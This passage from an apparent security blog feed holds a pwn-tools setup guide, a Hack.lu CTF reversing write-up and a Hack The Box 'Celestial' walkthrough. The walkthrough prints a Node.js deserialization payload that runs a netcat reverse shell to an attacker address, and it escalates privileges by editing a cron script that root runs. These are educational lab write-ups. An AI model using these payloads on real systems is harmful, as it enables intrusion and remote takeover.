do some pwnable challenges. This is not the only setup and a lot of people will have better or other tools in their collection. But for me, it is a good base for most of the pwnables I do.</p> <p>Disclaimer: I’m not a professional and therefore, some things could be wrong or could be done better. But let’s hope it is good enough! ;-)</p> <h2 id="base-system">Base System</h2> <p>As a host system, you can use whatever you want. Windows, Linux, MacOS or something else will do the work.</p> <h3 id="virtual-machines">Virtual Machines</h3> <p>Virtual machines are the best way to have a running system that can be compromised and later be restored to an earlier state. Therefore, I would recommend to not run the vulnerable code on your main systems and build your virtual environment where you can safely run vulnerable code. Moreover, it is very convenient to roll back your system in case of a bad behavior of some of the executables or if the system is damaged in a way.</p> <p><b>Virtualization Software</b>:</p> <ul> <li>VMWare Workstation (Pro), most students get a free copy</li> <li>VirtualBox, free and open-source</li> <li>Hyper-V, comes with Win10-Pro</li> <li>…</li> </ul> <h3 id="os-choice">OS Choice</h3> <p>Since most of the challenges are for Linux based systems, I would recommend to set up your custom virtual environment with a vanilla Linux like Ubuntu.</p> <h2 id="tools">Tools</h2> <p>Tools are an essential part of your pwn-environment because you will need some! In the following, I will describe some useful tools which I often use.</p> <h3 id="ipython">ipython</h3> <p>A good interactive python shell with tab completion and highlighting.</p> <h3 id="gdb">gdb</h3> <p>Debugging in Linux is done with <code class="language-plaintext highlighter-rouge">gdb</code> and I will not cover each command here because there are many tutorials available.</p> <h4 id="gdb-plugin-gef">gdb-Plugin: GEF</h4> <p><a href="https://github.com/hugsy/gef">GEF</a> is a great plugin for <code class="language-plaintext highlighter-rouge">gdb</code> which extends the debugging functionalities. Other plugins almost do the same as <a href="https://github.com/pwndbg/pwndbg">pwndbg</a> and <a href="https://github.com/longld/peda">PEDA</a>. I’ve decided that <code class="language-plaintext highlighter-rouge">GEF</code> is the right choice for me but feel free to try each one yourself.<br /> Some important commands we’ll use quite often:</p> <ul> <li> <p>Print memory<br /> eXamine memory: x/FMT ADDRESS.<br /> Example: <code class="language-plaintext highlighter-rouge">x/10gx $rsp</code><br /> This command will print 10 times a 8 byte value (g = giant word - 8 byte, w = word - 4 byte), starting from the address in <code class="language-plaintext highlighter-rouge">rsp</code>.<br /> More information at <a href="ftp://ftp.gnu.org/old-gnu/Manuals/gdb/html_chapter/gdb_9.html">gdb Manuals</a></p> </li> <li> <p>set follow-fork-mode child<br /> <code class="language-plaintext highlighter-rouge">gdb</code> follows a fork to debug the child process. It is essential for debugging a socket server which forks its process on each connection.<br /> Command: <code class="language-plaintext highlighter-rouge">set follow-fork-mode child</code></p> </li> <li> <p>search-pattern<br /> Easily find strings or your payload in the programs memory.<br /> Command: <code class="language-plaintext highlighter-rouge">search-pattern 'AAAAAAA'</code>`</p> </li> <li> <p>vmmap<br /> Display a comprehensive layout of the virtual memory mapping.</p> </li> </ul> <p>More information at <a href="https://gef.readthedocs.io/en/latest/config/">GEF-Docs</a>.</p> <h3 id="strace--ltrace">strace / ltrace</h3> <p>For a basic overview of the binary, you can use <code class="language-plaintext highlighter-rouge">strace</code> and <code class="language-plaintext highlighter-rouge">ltrace</code>. <code class="language-plaintext highlighter-rouge">strace</code> is a program to trace system calls and show all received signals of a given binary. <code class="language-plaintext highlighter-rouge">ltrace</code> does the same just with library calls. (e.g. read(..), fgets(…))</p> <p>Both tools are also great for reversing challenges because sometimes you might see some plaintext strings in function calls.</p> <h3 id="pwntools">Pwntools</h3> <p><a href="https://github.com/Gallopsled/pwntools">Pwntools</a> is a great collection of tools/functions packed into a library for python. It is designed for rapid prototyping (which I can confirm) and it makes your exploit development for different tasks a lot easier.<br /> A basic script could look like this:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwntools</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./challenge"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"Hello"</span><span class="p">)</span> <span class="k">print</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <p>A big advantage of this plugin is that the communication with processes, network sockets or other protocols like <code class="language-plaintext highlighter-rouge">ssh</code> uses the same interface. Therefore, you can easily develop your exploit against a local target with <code class="language-plaintext highlighter-rouge">r = process("challenge")</code> and later change one line to exploit the remote service <code class="language-plaintext highlighter-rouge">r = remote("192.168.1.42", 1337)</code>.</p> <h3 id="binary-ninja">Binary Ninja</h3> <p><a href="https://binary.ninja/">Binary Ninja</a> is a really great and especially affordable reverse engineering tool. It comes with a good disassembler, medium level and low-level intermediate languages and a great python API interface to develop your plugins for binary ninja.<br /> Further, you have some useful plugins already available at <a href="https://github.com/Vector35/community-plugins/tree/master/plugins">Binary Ninja Community Plugins</a>.</p> <h3 id="radare2">Radare2</h3> <p>Radare2 is also a great tool for reversing but it is kind of hard to begin with since it is a command-line tool. <a href="https://github.com/radare/radare2">radare2</a></p> <h3 id="ida-free">IDA Free</h3> <p>Another possible disassembler would be IDA free. Since this is a demo version the functionalities are a little bit restricted. But for a beginner, it is enough. <a href="https://www.hex-rays.com/products/ida/support/download_freeware.shtml">IDA Free</a>.</p> <h3 id="ropgadget--ropper">ROPgadget / Ropper</h3> <p><a href="https://github.com/JonathanSalwan/ROPgadget">ROPgagdet</a> looks for gadgets in a binary to build a ROP chain and it supports different architectures and file formats.<br /> <a href="https://github.com/sashs/Ropper">Ropper</a> does almost the same.</p> <h3 id="one-gadget">One Gadget</h3> <p><a href="https://github.com/david942j/one_gadget">One Gagdet</a> allows you to spawn a shell with <code class="language-plaintext highlighter-rouge">execve('/bin/sh', NULL, NULL)</code> via libc in one shot! Therefore, you only need to leak the libc base address in the target’s memory and redirect code execution to the gadget.</p> <h3 id="libc-database">Libc Database</h3> <p><a href="https://github.com/niklasb/libc-database">Libc Database</a> builds a database of libc offsets to identify used libc on the target machine. You have to be able to leak some libc pointers (e.g. via read primitive and <code class="language-plaintext highlighter-rouge">GOT</code> (Global Offset Table) addresses). A web-based variant is available at <a href="https://libc.blukat.me/">blukat.me</a>.</p> <hr /> <p>That’s all for the first post.</p> <p>See you soon.</p>made0x78Foreword This series will cover some basic exploitation techniques on Linux systems (x64) which are getting more advanced during the series. The main focus will be on bypassing protection mechanisms of modern systems like ASLR, non-executable stack, Stack Cookies and position-independent code. Each technical topic will be hands-on and I will provide an example to try it yourself and follow along.Hack.lu 2018: Baby Reverse2018-10-19T00:00:00+00:002018-10-19T00:00:00+00:00https://made0x78.com/ctfs-hacklu-babyreverse<p>Baby reverse was a beginner reversing challenge of this year’s hack.lu CTF. It was a great beginner challenge for people who are new to reversing at all.</p> <p>A really cool fact was that the challenge author provided some basic “todo” list to solve the challenge.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Hey there, future Reverser! We created this small challenge to introduce you to reverse engineering. This task might _still_ take quite some time, but trust us, it will be very rewarding! We sadly can't spoonfeed you, but we created a set of questions that you might want to answer yourself. We expect you to google on your own and find resources. Sooo, lets get started! - What kind of binary have you got infront of you? (Hint: "file" command) - How can you disassemble the file? (objdump, gdb, radare...) - Which programs are common debuggers? - How can I use them? (we recommend gdb with the peda plugin) - - how can I set breakpoints? - - in which different ways can I step through programs? - - how can I print/examine the content of memory/addresses - what is inside registers? what's rax, rip, rsp? - what is the linux syscall convention? - - In which register is the second argument? - - In which register is the syscall number? - - - where can I find the syscall numbers on my own linux system? - what happens at a call instruction? - how can I compare strings in assembly? - .. ask your teammates for more! annoy them if anything is unclear :P - .. if you don't got any teammates, use IRC and say that it's about the baby challenge There is a lot of work ahead of you, and maybe some sleepless nights with a lot of googling - but it will be worth it;-)! We are certain that with a dedicated mind you can solve this task and from there on you'll be ready for a bright future! Don't give up, we all have been there. Stick to it and you'll be rewarded =) </code></pre></div></div> <p>Therefore, a beginner could just follow the notes and try to figure out what the program does.</p> <h2 id="analysis-of-the-program">Analysis of the Program</h2> <p>The first command we use is <code class="language-plaintext highlighter-rouge">file</code> to find out which architecture the binary supports.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>file chall chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped </code></pre></div></div> <p>We have a 64-bit binary and for that reason, we have 64-bit registers and we have to use registers for function calls. Next, we run the binary to see what it does. This is a very important step to get a general overview of a challenge.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./chall Welcome to this Chall! Enter the Key to win: AAAA </code></pre></div></div> <p>Okay, we can enter some data and then the program exits.</p> <p>Let’s open the challenge in <code class="language-plaintext highlighter-rouge">gdb</code>. In my case, I will use <a href="https://github.com/hugsy/gef">GEF</a> as a gdb plugin instead of peda as recommended by the todo list.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb ./chall gef&gt; start # runs until the program is loaded </code></pre></div></div> <p>Further, we can step through the program with <code class="language-plaintext highlighter-rouge">si</code> (step into) to execute each instruction and have the ability to follow function calls. If we don’t want to follow function calls, we could use <code class="language-plaintext highlighter-rouge">ni</code> (not into). While stepping through the program, we can observe, that at some point the instructions are repeating. That means, that we have entered a loop and since the loop contains an XOR instruction, we can guess, that this is some sort of “encoding” algorithm.</p> <p>Let’s restart the program and find out where our input is stored. If we step through the code, we can observe two syscalls at the beginning. The first syscall prints the message <code class="language-plaintext highlighter-rouge">Welcome to this Chall!</code>. We can find the syscall number in the <code class="language-plaintext highlighter-rouge">rax</code> register and look the syscall number up (<a href="https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl">SyscallTable64Bit</a>).<br /></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>First syscall: rax = 1 -&gt; write rsi = 0x4000d7 → "Welcome to this Chall! \nEnter the Key to win:" It prints the message we saw earlier. Second syscall: rax = 0 -&gt; read rsi = 0x4000d7 → "Welcome to this Chall! \nEnter the Key to win:" This means that we read (from stdin) to our buffer at rsi. So basically, we write new data in the message buffer. </code></pre></div></div> <p>Afterward, we enter the following loop:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x400098 movzx rdi, BYTE PTR [rsi+0x1] 0x40009d xor QWORD PTR [rsi], rdi 0x4000a0 inc rsi 0x4000a3 dec rdx 0x4000a6 jne 0x400098 </code></pre></div></div> <p>The loop iterates over our message buffer (with our input) and XORs the current indexed character with the next one in the buffer and writes the result to the currently indexed character. Let the buffer be <code class="language-plaintext highlighter-rouge">ABCD</code>.<br /> The algorithm will perform the following operations:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>A = 0x41 B = 0x42 C = 0x43 D = 0x44 buffer = {0x41, 0x42, 0x43, 0x44} i = index (incremented by the algorithm) buffer[i] = buffer[i] ^ buffer[i+1] ( = 0x41^0x42 = 0x03 ) i = i + 1 buffer[i] = buffer[i] ^ buffer[i+1] ( = 0x42^0x43 = 0x01 ) ... </code></pre></div></div> <p>Further, we can observe a loop index (rdx) which is decremented in each iteration. If rdx becomes zero, the loop exits at <code class="language-plaintext highlighter-rouge">jne 0x400098</code></p> <p>After the loop ends we can see a comparison between two buffers <code class="language-plaintext highlighter-rouge">repz cmps BYTE PTR ds:[rsi], BYTE PTR es:[rdi]</code>. If we recall the algorithm, we know that our buffer is referenced by rsi and therefore rdi should be another buffer. Since these two buffers should be equal we can guess that this buffer contains the “encoded” flag.</p> <h1 id="developing-a-solution">Developing a Solution</h1> <p>To solve this problem, we first step in gdb until the comparison and copy the content of the other buffer.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gef➤ x/10gx $rdi 0x40010c: 0x261838221c060d0a 0x2c42591c2b390f36 0x40011c: 0x392d171c262c1a36 0x0709382b07014357 0x40012c: 0x392d17131317011a 0x2e007d5c46060d0a 0x40013c: 0x6261747274736873 0x0000747865742e00 0x40014c: 0x0000000000000000 0x0000000000000000 </code></pre></div></div> <p>Next, we have to reverse the hex data because it’s stored as little-endian. Here is a really quick and dirty algorithm that does the reversing of the string and also concatenates the parts to one string. (There is certainly a better solution e.g. print the data in gdb with the right format)</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">string</span> <span class="n">str1</span> <span class="o">=</span> <span class="s">"261838221c060d0a"</span> <span class="n">str2</span> <span class="o">=</span> <span class="s">"2c42591c2b390f36"</span> <span class="n">str3</span> <span class="o">=</span> <span class="s">"392d171c262c1a36"</span> <span class="n">str4</span> <span class="o">=</span> <span class="s">"0709382b07014357"</span> <span class="n">str5</span> <span class="o">=</span> <span class="s">"392d17131317011a"</span> <span class="n">str6</span> <span class="o">=</span> <span class="s">"2e007d5c46060d0a"</span> <span class="n">str7</span> <span class="o">=</span> <span class="s">"6261747274736873"</span> <span class="n">str8</span> <span class="o">=</span> <span class="s">"0000747865742e00"</span> <span class="nb">list</span> <span class="o">=</span> <span class="p">[</span><span class="n">str1</span><span class="p">,</span> <span class="n">str2</span><span class="p">,</span> <span class="n">str3</span><span class="p">,</span> <span class="n">str4</span><span class="p">,</span> <span class="n">str5</span><span class="p">,</span> <span class="n">str6</span><span class="p">,</span> <span class="n">str7</span><span class="p">,</span> <span class="n">str8</span><span class="p">]</span> <span class="n">goal</span> <span class="o">=</span> <span class="s">""</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">8</span><span class="p">):</span> <span class="c1"># loops through the list of the giant words dump </span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="nb">list</span><span class="p">[</span><span class="n">i</span><span class="p">]),</span><span class="mi">0</span><span class="p">,</span> <span class="o">-</span><span class="mi">2</span><span class="p">):</span> <span class="c1"># iterate through the string backwards / reverse the string </span> <span class="n">goal</span> <span class="o">+=</span> <span class="nb">list</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">n</span><span class="o">-</span><span class="mi">2</span><span class="p">:</span><span class="n">n</span><span class="p">]</span> <span class="k">print</span><span class="p">(</span><span class="n">goal</span><span class="p">)</span> </code></pre></div></div> <p>Next, we want to reverse the XOR operation. Since we know that the flag might start with “flag” we have some known plaintext. In our case 1 byte/character is enough to reverse the XOR operation. Let the first character be p[0] = ‘f’ and the first ciphertext character be 0x0a we can get the next plaintext p[1] with <code class="language-plaintext highlighter-rouge">chr(0x0a^ord('f')) = 'l'</code>. To get the whole flag we just have to repeat the XOR operation on p[i] and c[i] to get p[i+1].</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">plain</span> <span class="o">=</span> <span class="s">"fl"</span> <span class="c1"># known plaintext 'flag' </span><span class="n">counter</span> <span class="o">=</span> <span class="mi">1</span> <span class="n">goal</span> <span class="o">=</span> <span class="n">goal</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">"hex"</span><span class="p">)</span> <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">goal</span><span class="p">[</span><span class="mi">1</span><span class="p">:]:</span> <span class="n">plain</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="o">^</span> <span class="nb">ord</span><span class="p">(</span><span class="n">plain</span><span class="p">[</span><span class="n">counter</span><span class="p">]))</span> <span class="n">counter</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">print</span> <span class="n">plain</span> <span class="c1"># flag{Yay_if_th1s_is_yer_f1rst_gnisrever_flag!}...non printables </span></code></pre></div></div> <p>That’s it.</p>made0x78Baby reverse was a beginner reversing challenge of this year’s hack.lu CTF. It was a great beginner challenge for people who are new to reversing at all.Hack The Box: Celestial2018-08-26T00:00:00+00:002018-08-26T00:00:00+00:00https://made0x78.com/htb-celestial<p>Today, we are going to do Celestial of Hack the Box.</p> <h1 id="enumeration--exploitation">Enumeration &amp; Exploitation</h1> <p>First, we perform an initial <code class="language-plaintext highlighter-rouge">nmap</code> scan to find open ports.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Nmap 7.70 scan initiated Mon Jul 23 06:58:10 2018 as: nmap -sV -sC -oA init 10.10.10.85 Nmap scan report for 10.10.10.85 Host is up (0.023s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (text/html; charset=utf-8). Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jul 23 06:58:38 2018 -- 1 IP address (1 host up) scanned in 28.13 seconds </code></pre></div></div> <p>If we visit the page we are confronted with a 404 error page. But if we reload the page we can see a page with content: <code class="language-plaintext highlighter-rouge">Hey Dummy 2 + 2 is 22</code>.</p> <p>Let’s take a closer look:</p> <ul> <li>First open Burp Suite and configure your browser of choice to use 8080 as a proxy</li> <li>Turn on intercept</li> <li>Visit the website with cleared cache and cookies</li> </ul> <p>We can see that on the first visit a cookie is set:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set-Cookie: profile=eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D; Max-Age=900; Path=/; </code></pre></div></div> <p>The profile cookie looks very interesting because of the ending <code class="language-plaintext highlighter-rouge">==</code> which is almost always an indicator for base64 encoding. Now decode it as base64 and you’ll get a JSON object:</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="nl">"username"</span><span class="p">:</span><span class="s2">"Dummy"</span><span class="p">,</span><span class="nl">"country"</span><span class="p">:</span><span class="s2">"Idk Probably Somewhere Dumb"</span><span class="p">,</span><span class="nl">"city"</span><span class="p">:</span><span class="s2">"Lametown"</span><span class="p">,</span><span class="nl">"num"</span><span class="p">:</span><span class="s2">"2"</span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p>If you remember the content of the page of our second visit (after the cookie is set), we can guess that the <code class="language-plaintext highlighter-rouge">num</code> field could be the value that is used for the ‘computation’ shown above. Next, we can change the <code class="language-plaintext highlighter-rouge">num</code> field and insert another value like <code class="language-plaintext highlighter-rouge">3</code> which changes the output. Obviously, the JSON object is again base64 encoded and replaced in the HTTP header with the burp repeater.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Hey Dummy 3 + 3 is 33 </code></pre></div></div> <p>Let’s send some special characters to the application (e.g. <code class="language-plaintext highlighter-rouge">3'&gt;</code>)</p> <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html</span> <span class="na">lang=</span><span class="s">"en"</span><span class="nt">&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;meta</span> <span class="na">charset=</span><span class="s">"utf-8"</span><span class="nt">&gt;</span> <span class="nt">&lt;title&gt;</span>Error<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;pre&gt;</span>SyntaxError: Unexpected string<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at /home/sun/server.js:13:29<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at next (/home/sun/node_modules/express/lib/router/route.js:137:13)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at Route.dispatch (/home/sun/node_modules/express/lib/router/route.js:112:3)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at /home/sun/node_modules/express/lib/router/index.js:281:22<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at Function.process_params (/home/sun/node_modules/express/lib/router/index.js:335:12)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at next (/home/sun/node_modules/express/lib/router/index.js:275:10)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at cookieParser (/home/sun/node_modules/cookie-parser/index.js:70:5)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)<span class="nt">&lt;/pre&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre></div></div> <p>Ok, we get a syntax error which means our input is parsed. Moreover, we have leaked some internal paths of the target.</p> <p>Furthermore, we can do some research about <code class="language-plaintext highlighter-rouge">nodejs</code> exploitation which will lead to the exploitation of a <code class="language-plaintext highlighter-rouge">unserialize</code> function. If we dig deeper, we can execute a command like this [<a href="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/">External Tutorial</a>]:</p> <p>First we open a netcat listener on our machine with <code class="language-plaintext highlighter-rouge">nc -lvvp 1234</code> and then we can execute a command with</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"username":"Admin","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"_$$ND_FUNC$$_function (){\nexec=require('child_process').exec;\nexec('echo 1234 | nc 10.10.15.XX 1234');\nreturn 1\n}()"} </code></pre></div></div> <p>If it was successful, we can change our command to something more useful:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"username":"Admin","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"_$$ND_FUNC$$_function (){\nexec=require('child_process').exec;\nexec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.15.XX 1234 &gt;/tmp/f');\nreturn 1\n}()"} </code></pre></div></div> <p>Yes, got a shell!</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc -lvvp 1234 listening on [any] 1234 ... 10.10.10.85: inverse host lookup failed: Unknown host connect to [10.10.14.232] from (UNKNOWN) [10.10.10.85] 41274 /bin/sh: 0: can't access tty; job control turned off $ id uid=1000(sun) gid=1000(sun) groups=1000(sun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) </code></pre></div></div> <p>If we look at <code class="language-plaintext highlighter-rouge">server.js</code> in the home directory of the user, we can find the unserialize function and an eval expression which will execute our commands:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">//...</span> <span class="kd">var</span> <span class="nx">str</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Buffer</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">cookies</span><span class="p">.</span><span class="nx">profile</span><span class="p">,</span> <span class="dl">'</span><span class="s1">base64</span><span class="dl">'</span><span class="p">).</span><span class="nx">toString</span><span class="p">();</span> <span class="kd">var</span> <span class="nx">obj</span> <span class="o">=</span> <span class="nx">serialize</span><span class="p">.</span><span class="nx">unserialize</span><span class="p">(</span><span class="nx">str</span><span class="p">);</span> <span class="c1">//...</span> <span class="kd">var</span> <span class="nx">sum</span> <span class="o">=</span> <span class="nb">eval</span><span class="p">(</span><span class="nx">obj</span><span class="p">.</span><span class="nx">num</span> <span class="o">+</span> <span class="nx">obj</span><span class="p">.</span><span class="nx">num</span><span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="dl">"</span><span class="s2">Hey </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">obj</span><span class="p">.</span><span class="nx">username</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">obj</span><span class="p">.</span><span class="nx">num</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> + </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">obj</span><span class="p">.</span><span class="nx">num</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> is </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">sum</span><span class="p">);</span> <span class="c1">//...</span> </code></pre></div></div> <h1 id="privilege-escalation">Privilege Escalation</h1> <p>Besides the user.txt, which contains the flag of the user account, we see a script called <code class="language-plaintext highlighter-rouge">script.py</code> with one line of python code <code class="language-plaintext highlighter-rouge">print "Script is running..."</code>. If we take a look at the home directory we can find a root-owned file called <code class="language-plaintext highlighter-rouge">output.txt</code> which contains the string printed by the script above.</p> <p>So, we can guess that the root user periodically executes the script of the user <code class="language-plaintext highlighter-rouge">sun</code>. Therefore, we can easily modify <code class="language-plaintext highlighter-rouge">script.py</code> to get a shell or simply leak the <code class="language-plaintext highlighter-rouge">root.txt</code></p> <p>Replace the content of <code class="language-plaintext highlighter-rouge">script.py</code> with our python code:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>with open('/root/root.txt', 'rb') as f: print f.read() </code></pre></div></div> <p>After a few minutes, we can read the <code class="language-plaintext highlighter-rouge">output.txt</code> and we get the root flag.</p> <p><b>Important:</b> Please put the original code in <code class="language-plaintext highlighter-rouge">script.py</code> and remove the content of <code class="language-plaintext highlighter-rouge">output.txt</code> to avoid spoilers. <br /><br /><br /> Happy Hacking! =)</p>made0x78Today, we are going to do Celestial of Hack the Box.